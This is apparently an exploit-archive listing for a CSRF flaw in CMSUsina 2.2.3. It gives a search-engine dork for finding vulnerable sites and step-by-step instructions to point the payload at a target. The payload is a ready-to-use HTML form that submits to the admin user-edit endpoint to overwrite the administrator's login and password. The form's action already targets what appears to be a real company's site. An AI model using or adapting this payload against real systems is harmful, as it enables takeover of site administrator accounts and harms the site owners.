Share
## https://sploitus.com/exploit?id=PACKETSTORM:173843
====================================================================================================================================  
| # Title : CMSUsina V2.2.3 CSRF Add Admin Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit) |  
| # Vendor : http://www.ysy.com.br/ |   
| # Dork : "Desenvolvido por Usina da Criação" |  
====================================================================================================================================  
  
poc :  
  
[+] Dorking İn Google Or Other Search Enggine.  
  
[+] The following html code Edit admin .  
  
[+] Go to the line 3.  
  
[+] Set the target site link Save changes and apply .   
  
[+] infected file : site/adm/user.php.  
  
[+] http://127.0.0.1/site/adm/user.php  
  
[+] save code as poc.html .  
  
<p>Alterar seus dados de acesso</p>   
<fieldset><legend>ALTERAR DADOS</legend>   
<form name="editsenha" method="post" action="http://rcborgesconstrutoracombr/site/adm/user.php?acao=edit">   
<label><b>Usu&aacute;rio</b></label><br />   
<input type="text" name="login" value="." maxlength="14" size="70" /><br /><br /> <label>  
<b>Confirmar usu&aacute;rio</b></label><br /> <input type="text" name="login2" value="." maxlength="14" size="70" /><br />  
<br /> <label><b>Senha</b></label><br /> <input type="password" name="senha" value="." maxlength="14" size="70" /><br />  
<br /> <label><b>Confirmar senha</b></label><br /> <input type="password" name="senha2" value="." maxlength="14" size="70" /><br />  
<br /> <input type="submit" name="submit" value="Alterar senha" /> </form> </fieldset> <!-- fim conte?do --> </div> </td> </tr>   
</table> </body> </html>   
  
Greetings to :=================================================================  
jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |  
===============================================================================